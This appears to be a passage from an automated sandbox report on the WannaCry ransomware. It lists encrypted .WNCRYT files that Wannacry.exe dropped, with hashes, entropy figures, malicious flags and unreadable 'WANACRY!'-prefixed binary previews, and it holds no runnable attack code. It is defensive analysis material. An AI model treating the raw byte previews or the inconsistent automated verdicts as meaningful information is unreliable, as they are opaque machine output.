....M!....(F7C.D.....0F......f3^....{.7.-..y...U~.KI.......5.Ke....x.N...r...%...O..V@V.'....f:...O.+.=....../.I.Hq.q.VM....VL,.......u..`.....)F}.F.\|.....;..

C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	19560
Entropy (8bit):	7.990262050658129
Encrypted:	true
SSDEEP:	384:51MNhZ8HKHzhicuhLR5Tes4JM2Bopg9DpN+Vol3YReK:51MNh+LhRijJVBoC9DD+VK3YYK
MD5:	C89D7CE5A8B4F63A42444022E12433DD
SHA1:	747616750F1A5805699184E50A0EA5BA45E21DAF
SHA-256:	163DD0D647F103DF7DB280F560D033193C2022A89453BF71A76A08CF953F5456
SHA-512:	8AFE7050F916ABF35E9E1F39A8A3F60CD8F9904D63FC8C92B1C7D72D18BFD0C06423414F4FA26D061A248F6447A0BBC48191C982F06141E1F47CB7F3257FB473
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....Y...r.....cd...f..y.m...._......g....a.0.y.t.7.Q.].F4J..f.@........N #z.....c1....\',..]s(... ...\...1..$..w.......8........s.Q-........'..r6.FK...(O.rN.F...I....]...N.....!..7..`e...........V.J..l..b^.=...I...P......-..]....c.....W."s..n..~.....GK......8^..R.".H..9.._.9.aD.P.~..S@..K..tY.%.......!.@.G.\|.]C...hTg.7.>.2.e.......w._gN$i.....'...Q..x..O...c.)w.&...;. ...I...D..D..T../.e.X]@_...u....}...]3.r.#....1..c...2....x.1....k8....[.L........Zr^x....fd..U`;8G/(\.<.u..!g.{#..........74S\|...(......n.,...v.d....s6....b#.....r....j..x0...\|)A.....1./....i.....Y........V..mw......M.Y[....~`...@^.0.\|...{.>F.[....3..v?:M...h.v.B..3K...twh.............B$......".5..q.+...FA..*...d.@...mi.Y..KP...K.y.[...[.G..,h..l......f.;.&_,........q.]......uN\.yi...@MOXVS..k....(......w0.\|..p..D.....N.r.2.#..l.=.[.R..g..%.U.R.4xf2tqUn.5...,..CM&...YO..v....@.Wf....B^)....f.U..o.t.K.z..qA...6,.....7..R8..E...q...lM.?rKIZ..bQlke..C.E,;.<.M[...+...^...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BQJUWOYRTO.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.857818170607631
Encrypted:	false
SSDEEP:	24:bkq6Incc+WpfCee5YWS5z31Bl8fK64WnTSAZMXJcs9lIsx2gSSf4JAWA:bk5c+WpfCiNFBlJWGAZIx9K+SA
MD5:	9B0D3BE1261C84BBC737B00D5DE509B5
SHA1:	08A1A09B5E852D4AE4D473AB6FAD29AB04C8DF50
SHA-256:	89CB9D307D3D3B933ADFE976850D807177C4485B8C7C739567EEFB4F7EB8FA72
SHA-512:	1CC8D49414EF4AC0FE2E08E246455E24A0E8040378F5996CA60196097575FAFB2C08E6F7EB5F8A4172446D984FE771817FCAE70CD4E827111B0414D6AD6EFC27
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...........A... .v`..ab+.R-q...Ro...t..)z.%+....3.V......j.~P;9...c.AI..(..N}Il9B...<.7 ..>@....J.....@...2..v"O...1...X.C.xw.c..$..>.o...o.O....9.JI.)...2Z..s%-...8i[d.....6..o..C..;..UM......3.._E.#wCI.A.d5[.rGjT_...<.X.......Ls...:..U.......>.k:6............^`"..\.y.%]!.:..@.\......K.C;....\M.hq..9....:N7.k(6.u.We...h..fH'..O......u..C...e....m<....1".'U..GQ..A...@"....I++(..4..w.... 5%....#.3...5OX.E<..F....a.....v!i^.,=..&.C........../K]:.BC4P..t.!...a.....eH5.!Z..<..C....;..mb...T.........b9q.f.8.5V.1j.....U8^d...F.!Wp%.4.^.VSc..N\...-7x.C.Q....T..e.P0.././..5..Y..dPS.-.AQD9.v.o..F.[.gq/q....T......h.U..^..+x.YN?W...<...K;.z.7hG;+?b..I..?...z}.,3BA(k..<....@#CLt(.tg.S$....EU1`....j.4....>T.e..}.../^bx..S..*..Bw...#BeG\|6.....u..q(.Y.....oN..g...C...&..t.D.....,.Q..........._."....XV...[...f:.F\>.3G..N.y......8?.......Y..kH..AL....w.Z.^Fa.....Iz.i6.y...7......\..xb#>..S)J..3z...j..B.p...U..I...$.[}...4.w...?.g....g.+..J}..Wu.d..g._..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\COUBMCBZDK.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.849826771788957
Encrypted:	false
SSDEEP:	24:bkZsp4F87ohciJuEpGjR+OI+HKZmVdS5bzk0gG+3NYu0neuWnYwfs3jKi:bkSp4magN+OZHKZGd+IG6NYcXsb
MD5:	B3DA4DD06ADE06B08A395B299D3DAC95
SHA1:	8727113730E5C86D4CF6E0F966ACBEAD318A9EA5
SHA-256:	26191D6EC635DB37AD748267D33BE2A2750DBA8C7BFB24C1AE1A5B325BBB2930
SHA-512:	DF2C7522F5FE968E57E4E5ABA0AEC05D5131C2FF49DCA17B9F16346C48E8DC1F1C37A49F84D76758A45D07C8D40E217B974F43F8F58539C828A974305984A319
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......P.k..U1z....:!).u..-........i...0M.'.0.m.\|..[;..+-...p..,d........Y+..e@r,U.....O...1......b .=...=T.sA..3-[#\|.UI..=..".O....$E..:..v.....r.:.X.h./...%.-.3..G6j.-.f...'..@.......:A....e.O=..<@.3.(...~...Zx.}.w..];..YD.......]......XV...G..................s...X.[?>.0.I.y..m<CI...........T&.6..3.R..G.U?".s9t..cw.y.!.....5{q.Xd..923.......E.z.b\]...k..,.S........$o.Dr......../.O.C...8.2.O....0......<m.gu)GO:Q..............P}.KI.....Xa.\|...%......l.M.L..=\....\|..X..n..7..\.."1.>.}.F..1...^..mrz...i..N......Z..v<x.$.=.q....c.9U....p.......FK3\kd...T.M....1v1.......H.P.wz...4X.....h..>.....d..c&uN.7/.0..p..a..Q.p?..#1.V...Jm.?.h.b....=...o8...3z...5+A.~^...@......p...5..f.@........T.6.L.In;...F.X.S&^{......w8....7Kp..\...*......G..4bx.z;......\....v....?.l..Kt..q..D...-..._....2.`5.m.......d......\. <x-OK.L....Ng.....[..o....<.z..=.r.A.`.!KHb'G..)..qy...ZU.E.in(k..Ib}........w..........J...3..B.m"iv...P...k

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\COUBMCBZDK.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.854758643866394
Encrypted:	false
SSDEEP:	24:bkK1pfxNF9syXKztbuc4+bEfTyHyMBMj39M4m1cOu9ogpbT0OP6foqbtG:bkexNF9Y4cREfTyfyBRGtu9ogl0OPU0
MD5:	6257E667BE4AE1B752594F8EF01DDBEE
SHA1:	6BB35AFC8F1FC788DE5A47CEDA354AFE6D8B01D6
SHA-256:	7E0B7A9AC3A108921033392814929F571A08FEAD399129D0CF4A716B25619D21
SHA-512:	7B86730697FB1672690BCCD3580823A4F7A3D64BD7B5460B62E085BEBDF57EF4416E196BCFC5EA743525E19AF2527610D8D9275682A777F87457DD20CD858F45
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......W..DOez..)..R..&@.tL:~....I...l.E.}.b5..E.. ..}.....!..H.H.....kf.~Y3...\x`....S.H.Q....vY<5.p.....2&%.z .........,P.(..9f.k...V.....~......'.9.m+........a......n..i.$.LFl..'....Y.[^.....gc...M.._wyu..y..3.o..T..._/.L..T...Y._.pQ9.`..............Q6..........E.L.H....!...q.....qFU1l+....=...U.M.dQs.0..r......B.......B>[_.A<..8[.k.:..8.[N.5.Th......NF. .@@.+.....U..1'u..v .~.... 1.....G....d....;T.~B .=/;..#"._-#0=NE..OL._..]..3.O5J.<....VFtCy..'3.?.........{..4.6.IX.......G=a....n...G..f.%..Q..1.O.9.43..C.8.~.-.=.p.N.0'...]`].\|....'D.i\yf./,..p....3.s..e~@....'`..t........@...y..^.y.J.Q.q..}y....{~,..w.}......l.(8.]..[..... ...gtE}..l/....a/..u_Ui..^']0"..Qo..q.s!....7.... .'..n...o.......k...w.I.a....x.C9@...C.L.2...." yq,.......+........EoNK.$.(.{....z.y.R}.iq&i.d.j....,..$....b......g.G."ft...x..........CK...vX.&i.h..D..h[z..\|/w..1..;U.~....3.fit4.D.........E.SA.......*.:}......6k!..Z........Y\%.,....4..I......u

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CZQKSDDMWR.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8364228119144945
Encrypted:	false
SSDEEP:	24:bk/EOAyJ3IEPJkvtaWhA1EfakVVHj3ebgYPPwd8Fx49ggXaVn:bkM4Ynt5cwH7ebgYPPi8FDgqV
MD5:	8EDAE6E8FF2F63B00C52D83390160D2B
SHA1:	345529D61C1CE776F7BB351D0BB0CAA4B28D1D0A
SHA-256:	284BE17264172F14CE1A626BA2A246ECDB964CCF8DB014436C812F6D85555C2D
SHA-512:	AF8F5321147942B1E600D05B717052B3B10D0647391C9B7968203C3D633C6740BA709D7F6EB8CBA3F632B5B89A51517DFADA3539B2BBEE74E074A3E5C1660C60
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....B.%...._V..b.6._.....6.C..E....p...%........)s6..r./..\......`.r".+.=.w...a..VU....>0.a.A.-...8..b.l+.=.....C\|..jxW..V.!.m....o.2.!...l..p....)...........r..Z....w.QG..>.rd;8...k....>.?.)......oF.U7.A...{.y.A(..C..R.;.....'....V.y..V.e..6.2...Q..M............uSc......W....T-....n..2..w\..\.........[....]..&...TV._.9...p....t...g.....J.% ....w:.l...d....$..# .....i...-......}F........a..@7r....U\|w..(...l.O}k?-...Z......%t..9.a..{.wfE.X....L".FX-.ty<....G...<..j.nz'.CR....$.+.......!IUb.JL.......=..B.'..4.\......U..P....d.....].f...../.X7..%.Z.s..g..o...=2.<8\.}'..R...Q...@G.%7b#Y.g...6.DEU4+..."zwL..[v>L..@.....8.Vm..}.G,"...f_. x`..=".V..h+......l,......j.z....v\W.....,....k ?v..6.....gf.O.]..G...cAxF..~oC`2.........O...R....nn.~..H6...%..C`K........F\|z....8.p...F...A.Z<~.S...P........r".@.g..+AjF.U..;m}....6...E.....p.....v......Z...z.)i.?..H....5......-.....oRq@^@n*x...x.@/.5m...4E...&e.x...x..v...e6..M.q.se..-#.n.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ELJIQGVHSI.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.850826325356461
Encrypted:	false
SSDEEP:	24:bkLs02ho7OXeYzxMnAAlz9OWFvOIfiex246gXb6PKpcFIHefo+IPrcBAH45N:bkLsPho6OpEWFXz5L6bovsuH2
MD5:	59D55ACF26AE16D7DF0D92EED8F0BCBC
SHA1:	EE818DC3320DEF9D55E9B2AAE8DC8C3739A7C510
SHA-256:	B214418D870377E847B9B7490AF8B05CFC873273A56924DFE3792B7009CBBEF6
SHA-512:	C52CEC2A3A008CF709425D34C811FC17B0DFBAE8ADF9EA4A0FC1B814233B1FC71838F4B006F6CB01F362C05AB7DE595CF0BD7EE06382B03A734DFF0AB344835D
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......!t~(3O0..oo.:T...z,.X...AG.BC......."..b...kH^.u. ...h..U......_{....~q.[.x.%......}..n..G.).R..(")=.(...t.... ...-f..%.d....".j...;...... lSW.....G.............,\....._#}...s..}.;9..T...kp<..3...n.7.....G..D.."K.....G.....m$hm...~.T..............!3..b..F...,.,r..t..V.=.,FQt.&..y_...%7#..U..q}1..m.9...\|..z....\|!@..l....R..[....}..(.]....{..>.M..L8.$.lM.......P....._m=.N..n\.s.....?.g..rGO..pw..F1&....@O.\|P+...J.........#.5.......P.!.....?].'....,.U.^...4....5...>......\^..G...VX...a%........3K...3.dpm..G&..)..&.7.Gg...e.....,e..g(O.....6.``mz....;.#...$.0).I..-.{.r..>....(o.Z;_._a.....l.o..2u.W1.!T..yx...w...u%.....+....9...\|._._....Z&>....1.....c.].....OiZSs{q..'c........O.....^..F...f.Jf....Ko..e..T@.......X...(...r.].+,..L..%.1.2R$s.Avy.....A..:$.BfJ...../.4..bg... P.b.$..$0...6.7....+.9?. .s......!H..P.cf.S.nD.Wwu.Z.N....#.e...a...3.`...../..7.ew4..;%%......(.O.S...a.q.yD..).@...rdn....{6...y.....:

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EWZCVGNOWT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.850502554040945
Encrypted:	false
SSDEEP:	24:bkJ2dZ3aq5Wd8W9dBSU9asGrqqillcj35OKHb3iWrVAOX7uh1aUtSk0bVJa:bkJ2dZX5i9dlNEDLZA8ujana
MD5:	76F2E8E837C2FC31F9DE782188EC9EDA
SHA1:	B2F4672A96CF9FCA75D42C27106A0E4EAF61A5EF
SHA-256:	27D509FA1702834616057098CA91408AD6C7BB431EC409D71333ACFD43BFD71A
SHA-512:	E42E3964DDE31B58F8F6AE5FC0E76E1CFFB8911CF84CBDE18D3CF26A675F0AD480C42C452912E8320A44130DE6A88AE56FE4A3F46AF567AA4499E6B868E83D67
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....D._]..3...p....'R[.5x....l..'.......S......z......J.........NUX..j_..'v...O..r.`..#..R,b"8..L...Y9..Mo.s,@..[.X.RZ@vH..z...=...F.....`t.i5..'1./...CBPx.!.j.p...`....7P.....\...[..M.v...9..@=$7..JL.<G...&..... G...[%.9..:..}c.0....b......`..q^<..............}R...r~.vL1.e$..t..hh.0d....6.'...Jy......f.........%..L..k.E..3BR.....03._2.._.T+...\...F.q.m...o.i..N.'.....-.......!E ..Y.0V....k*@...Q.7..`.MB.8.n`..RK.").S[..1...q=+._.m..E.....9Mm...1.I..Pg.....o;.=..W.>......X.+...]e.wx..Ip&.`....I.p>..3O... ...t.l.DK..('y...zx.....^.u.V$e.K.?..J.Y....%....A..'..w........K.3..R......F<.E7.f...P....c.........n.W.....(....:I......L..'{.~..].w........?.......M...M.J..V.H.9FI=........[.....@-.H..J.^.{...r..me.....XRm....@..G..X.U..U....G.".:V..:..9b.U.Qlw)...\U#....^.#....M.o~)&......(.K3.l...O.c..^.c..Y5.]../z.[.T...yL?....~y.b.].\|.^G.r..".7.H......z.D.q.HS.U.C..l.......&.r7+.~.&l.x.2u..vc.D...$6.W^b.@..R2=..H..[...."..B...i.y.$.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FGAWOVZUJP.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.82114632552718
Encrypted:	false
SSDEEP:	24:bkz3+kMNfHZ+dHb/z87BEDohwZ36f6Kuil+AUgbxC1mfT7JNikGg:bk9Ml8j8B0FtBA5FB5Nipg
MD5:	DCD174B049043A727A284FA108470CDA
SHA1:	275C1521B483CE9D30FE0E8F887F940B257C186E
SHA-256:	E43CC016A12CFBC6893C3B88477B36D70B282E86CA6A5EC27881D414F4AE834B
SHA-512:	451BCC6156A7F3EAAA4998708079AC624EBBEC9756BB0F134F13A9B4EDBF0DBB777F9DB42641386D558D24579EC500642A4B2CF11B875A1CF8F3522C2160C1A9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......O.e....J/.n.E..`..`..Y..]].Yg.j.>..e....x.-./..Ds...[...F..4.m.../...0...s.]>r..&...H.)...%R.3]......u..#.>..5.-.........S..!....5;&.?.{6..[F......Mi..w.:x...E.o.{....Kg.U..L.\\.7.B.h.G5.;D....u...d.d&!...yj...O.zV.!....j.......p.$.............#...,.4y.Y....8O..VBa..r..4..st....fZDa:.a.p..TP...p.r..%.0.$0.cc.....r..s...P.&L..{g...x.,.U..T}B./h.v.{.qC....`.K..}J..........)..b.A.I.C.[......M`.=2........<..ps.8Z..1........p.....&rg...2....%........q._.'..G.:.<.-..m1....G....2cj...^Gxj.!<...s.o.kCaUzk3!.j..@.'...$b..R..c.Z.e:2...z.fFxfH......aYa...~P..{U...!...T.$.\|i.mLQE.v..1.`.8.{.....~..@.(.ZH.5:.V......yD.ix..<31..1/Q.'.0...p%.~.o..,x%qF..3...........n.C).}#.......B...!.6...Xr....<.!/...j....2TWG!..s;..........R...v..$@.....A"$.4..7.....\|.dq.!.z/%..3.jV...$3.\|......(..U........J.E.e.d".qM..m...:Z.#Ds...d..w.....~.6v.[.p..-x...t.)....._....R.M..-5.p;.<..0).F.A.WS.....GH..........,.OE.Z.)...?Ws..K.{(..9....kB....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.835809445332513
Encrypted:	false
SSDEEP:	24:bkDSdGLnm4u5qvAQ7M4nwIE2A1j+HYp8SN8OlkmV1e/8hsUTNxBzoJ28kT/nno7W:bk6FDTQ7M4nwIEd1K108OmmNsuzo1kTD
MD5:	5A1FB13337026BA71804FC839588FB93
SHA1:	CB3C9C78799D27AC906A65C36EA4B1A76FCB5D0D
SHA-256:	6F04FA7CE770ACD4EDF6C73A98A34CC15B0419FB1DA7EBA5B20C7B51E8F09EB8
SHA-512:	F1DEFD48068279B08BB75624B665D0FB03063E2C6A028754D57ACC213A6AC2AC2D7AE91E0F7D1B3AED0404D07DD0B8FCE3436B6CA1E7D4DF8696C7714D27DD2E
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....Xx=...\$w.2y.Z....m.v...'c...M ......l.9I..."u...@I.l.2`....1.f..j....."O.7$...}0.....g^.3...&...ch..3.)...n.FK...q....t.....+..>.S.B...dN.z#....f..p...,...fm&.r.P.....n.Y...qx...`...X:.....5.....@........G..71.. ..s_2S......j).."P.0.................c..O....R.F.L....'..Y..l..F...3Q.o..1....1.G....%......!w..x[y..}..2..)ql......W.~.......K.{'q....x...>.J...\|...A.!.9.....CPv..(.w.:.....!....!..5..Ac..d"\|..n.s..-Q...S...6.N...{..$.........'...(.q.{....}.,..Z.YT......?..........=.....5/..c.Of...QE.`#^. .q...rb.n?.#..9..X>..@zA`....<.."...6R./7.<%Z.k'=..t.......... .T:.......+,.S...M.d.~..)..j...N%J...+.\|C_+....J8.Hx....o6.R..c..w....=O.kw.......w...ih.ap[a.......r.z..%O.+..-..C._.o......yX..k....... .......w.c.o..]..d..2.Sw....^].6...7....t...F/.58w.U8@bK..........f.,......K&.Kl....A...'dA..f...j.<.P`,....K.4...s...3 ..i.S..)1F...c...7.HA......@....j ^...1....r.0m$..A...D&...9.....!.4D.R..J..#...s.Ms..2;..C.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8701125261509794
Encrypted:	false
SSDEEP:	24:bkWfxwHK4qebCJxA3IxXERXHmSD/qjzIr608OWzpBV6H5szK18B7ZrAQDyV38:bkWfxwOVxA3zRXHmSD/yOv8OQVyn8B73
MD5:	2A14BF41F4C675C6E317B5C0A1221554
SHA1:	976AD91E04585CE874A1C8044EEA9CD1D1CAAFA3
SHA-256:	5B0D9A8726B6D14DFD85C66FCEC5241CAF715BFE9C42FB009CD7AE82FBFB785D
SHA-512:	88B73C6E8B14C1FE773A0139238A6FF09ACED3674C074476DBDDE71CD80F84D8E43BDF64067CEAEACC5DC92678C4B5D5873C3695DC2047CC194291933CFBEA46
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......F&(....b...lhN1..H".7....s.Jj....S...iIfM.yM.:x...9....bU.... ..?.............Y.&Q {.wt0.iS....<Wu...oT...d.C.`....ds.-.YJ1Z@.......<......d.....:8-......gx.9...cnD..LO..'.....p`K.c..=w..`.t.R.h..~....H....E9^..5.?.).0..!.1......."W.W...............'..g.)...{\|.52\S5>}8g,.s.d....'S.....G>3m3.e..>..}..<.o..u....7...........".Mk.....l...@AKKm_..FI.y.cSXz6...4....a..)(...=......".p.c... F;ze.AJ...<.\.....8..sft..+.C..sd..Z.2..sY.m.....8.....8....O.....:.j"..H.-....hn.M.I6..I.L..t......-F$.M..\ 0.I..Qk.R...k.Y.i .3..c.G..@.........o..%._.yY....u])....).u.(c.h...{)>q...H2.d.K.........6.......P....?~@......\|..~.I..N.o.@.....S".G..^)h....^(..4./..t.M.G.D...\.]...R<~6..}...?..."N:....F;z..S..a,`.&.'..ug....8M.;.u...wi#..$.d.jE....y..!.6...........?C.H...i..........'.%.S....a.....C.......q.r.)..k/.[..".&.U9`..x..:.7.F..+;.D..j..#...I.m..h~.".....5.q\d..,!....z...@...._.......C.....k....U..Qf...........zU....*.<..0.6!x[..}....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\JDDHMPCDUJ.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.833073659959263
Encrypted:	false
SSDEEP:	24:bkMDb+7hppP7xQT5kPjnCGDJmVgv/smJiODey1R5eiSQpBk/r+Xvot0EjT:bkMv+FFCgFmVA/Nuyk/qwt0EjT
MD5:	043E7396306FD9506C8AFF85A4F097AF
SHA1:	C07643DE4C283120D4880E7E3BE2C3FA566329FB
SHA-256:	DF25D5B1791A503B40F0FBF694459C9BE267A80660825482249F0EAE5C82DB9E
SHA-512:	9CFEB1B4299CCB863EB03AC782EBB349CDDA66180CBC39B04D3988DFC8A1D45FD5427AC2A5365832ADF3954D0F5C5FEF697D5AFFE26B18C4CA03FAA24CAFD813
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....d...da.NN.............s..)0$:....8...-.HV.e.......j."...4.KD....o2....Z.%.zL..$~...B.6.h...w.6..m...t...&m=.lw3.=j......p.H.W..5.C....;.....t..=...C.Q....o..ZC.r..S.o.....D.n.I1"sa...OiP...Jc.TN...Ly...e.. ..X.[.O.4.O ......6.Q.y.k'.......E7. .............M8(H.9 ...p./t+.......B..Z!&. ..&7...{._.e..%.G.:ls.A4'..M.4.7.0.."..Nl.w.8.de........!.{....,n..4..[Wb.>k..r.s.o....R......!..h.E..ns.y%.t..../....7..F....\|VM...U6...d...f......X1.9...C",.}......K.....".@..J..:.%....PE...:..t..L.6......g$...zSb,.g3:.V.s...?....w...y.N.l.e..V.T5.B.n..:i=b....D..79u.}..e.'..F.r..1........z.a.1....-..S.a.d)\|.Z.x[..F..n..If.....)G..39_............Q ..E..n5A...DH...t&.q...\|.F....rT,_.i..I......g..d1.....:.(....bp..!.K!..i........S.O..b.........l...@..G....(..a....n.wG.. $.v...]t........h%OJi&=..]...M.%.....O.R.1x[%S......OT..s/.\.... i..#....{..D.b.\NpW..@R........$.u...F.B..'.QI.XhUm.JQ.X.......F..T...A...&..0N..t4..e.S&\. .#/.f...A

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KLIZUSIQEN.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.851128962466472
Encrypted:	false
SSDEEP:	24:bkOl9qgVPhi1VZK7qXPk+TvwbQJsUKQZvnNRg4lyYDEAp7YLDbAYZRA6Gre:bkOl9BQzc+TvEHUxhNR/yYYAVYjVZrGC
MD5:	432BD1C0EA15856B573BD51F3BA36045
SHA1:	6106DBBED68DF54ADC1337ED449A7A74A42CDE86
SHA-256:	E0E59EB9D84CB5553715FB1CF4A4278222554CEB7DF4553F203C154915F30820
SHA-512:	BF42A367607B69E28ED866F5EDB7CA4387AC5DDD5FBC36134B4478A9F13217DB4B70A686C49F90ABC83F3B57D459E88D220E7EEB7973179ACA68B73A6EE3EA1F
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....;D..@.$.n...L....r..#!..Pl..-.T....=...........FaG.x.....M...k....C..A..M.B..,/$C.J....ag...F..%.O.....1.?w.3.;...Z..)l......".i......!.Je...X#ygl.6]H.I.%M\.!..+..B....@$...f.gc..\|V..y.....\J......3.........l....../QQ.SR.....a.X...j.<.+N<L..~.$...............-.f.au....x7s\!.9...Aa+H...A.3........Vt.;f5.....4hGno(.,.v..D..W..+...nw...&....Q...&..[W.`..61.z.gN:..k3m......}t..d&0.s..R....L.}9h.A...2.?4}.{a7.2U!.....i..........?<.o...+..Z..(/23e.sH....5.$.MH.S....i..3.. &c#.......'...J.......#...3..Y...]!=..5....7hv.vH.;rx`..Ni...J.../..gCxT...='...p.....F>.N..>..(&y..B.....>'..o.N.C...\.5....=.....H..c.H...j+":Q................{.HJo....'D_.<..(.....Y>L..Y,,h.\h.....k..."1[.......,f.g..E..Q.8.6...-w..%.r.Y...\..F..8HdR.qT..o]...n.H...[.Q"..>.l_..F....!..[...9`p..R...z.......7?<...6%[.cq.......&W....w. go....^.F.]W#.H..t..#&.e.:.@...v&d..OV........e3.l..H.._.....v.[O.....d........kh._4...)...q.w.u<.>.._h,\|D-.Wfr.....Q.........ddP.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LCMFMMJDAC.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.813942184251048
Encrypted:	false
SSDEEP:	24:bkChWo1vStFsAcEbHhs6Lws0WvnETNQ2A5s6oirFocIe+aCMtBcHW8sByNfI/Y82:bkCF1Lmh5RtE6v5nIeTtChsBy1Iy
MD5:	F2F7246A6BB20590339B22B4BA2B1B5D
SHA1:	90DB86ACF02F8EEDF0291559D25511059C2BF19D
SHA-256:	DE54641CB2DBFD331B629B1C488904FC1EE94186D2F6479E9103CD282FF7C9B7
SHA-512:	EE2D41D263288CB23EBCB24705C8E52B7C8E63BCB607F104C07CA1490FDA13FD2B8098D86968FB092C55B776D25502672841242F71406D1F14FD1E34AA1459DA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....o.oJ.a1.c,.....IO{..<.K`.p.1.....J..PZ....S.l.v.5..wH.....{.].Elv.p..4wP.x............;;......"..LW.....!.}u.S.~..(...(...<.\|.b........VZ.K...o.A....^.O...(....n.."..._.)g..J.H...~6.......Hx...... ......J.4w6/.a"..C9...P.....s..^....N.............x...3........H%...'/6..........>o..,?j/.n...%..C..!...x0.v..fq...G......QP.....\|.E..../A..y~....!.M!>W.E.h.J.j....c...!:@.~s...w.K.5..g.....].._.K.r.G.."...T.h.F....p...Wp.h....~.".nF.Fz..7ydO#.;...>.X......Qz .(H\ ....u..x...2_x\|...L.U..1>.JND.'+.E.E..f&a6.\.R.......gRu.....Q....yGfoI\|j.D.W^bt...>..^n.l.....JJZ..a..}..`....%....g.KH....a+.a...c;w...G.~W.."..Xy.r.....XRu............)...=..Q....Jb."..k....q.>..uX:..CY....1#z+I.b."....}..b..:.)..+..{.:9.G.w.w.}.Q.V..E.#u.%z=..r....\|.M.3M ...N._....../9...x..a.J..k?.....(;....n...N......`...$ ....)........K.K?.....DHY.o_.u...#.+.9..!Q.2.i5....$..a......:$.......).Qc.+..._....n.I..F...]tQ/Q...S..wf]T...Q....W...D..]..22..0v{...,.;..!.`.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NWCXBPIUYI.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.84238380361571
Encrypted:	false
SSDEEP:	24:bkXWc9qdNEYRtn1yp0/39gJAJCFDU4ID2OCqYpDrYBc7KewmjgoxH1ZPWv:bkGxdNxRtnntxB4ID25Nrsc7rHCv
MD5:	A9C1ACFDD607645241E9B7B0CC0ECCC5
SHA1:	46EC24968B70729925BB04C805E3D4B1FB3790E4
SHA-256:	0FC1256EE9DDAB570383941B736D9D16D9E3CE6556D7F8B668E9A1DF4E36B34C
SHA-512:	7CC6A01B88F638FB4A9340EF875ED7F3C3A3497F605A7C644342021B5553FC9D647983F68086AA3DC83E1DB83D5310EAFD9D1510A5E61E506D43BE6C348B7BB5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......}...(.Bvc..%.M...`..F....E..?HV.;.............H....v...XVQ..6....~....rxQ-/pB..C.,J.z..'...6"..........+..\|.ek....-.i.._.k......=.I`<.....b;G<...y..6.kQ.....lTW.,.N8.k.(4...=D...M..v..;._D...}.RH.W{)1.~..huE%..J....^.....[T..b@?...n_/..................Z{......]B......A....o...t.&...p'...BY....]G:3......L...=.d..P......%u.;.s.....>q.....0W9....q..L.Yp..\,...n...XKj~.........Q....wpP...P$Z.w..2..._.F.........%......f...c.Dv..q0.;Ldg.....x..2aX^..\R#.&s.}...GA.....>.3..B.$.....;../.....o..8..=`..7.).B..+.mN.gc.P.{u....A....v....6._4.2..c..ZxOH...-.V6K...k..R.n$..U>b.....A.-.N...T.w....X.c>o.......j..r..6."....w>...U...F.....f"7#.+K........".fJ..v...,D ..).-...e.M~3,.....<..4S.^b.z[{x.?.<...w..nn...ob....%_?..= 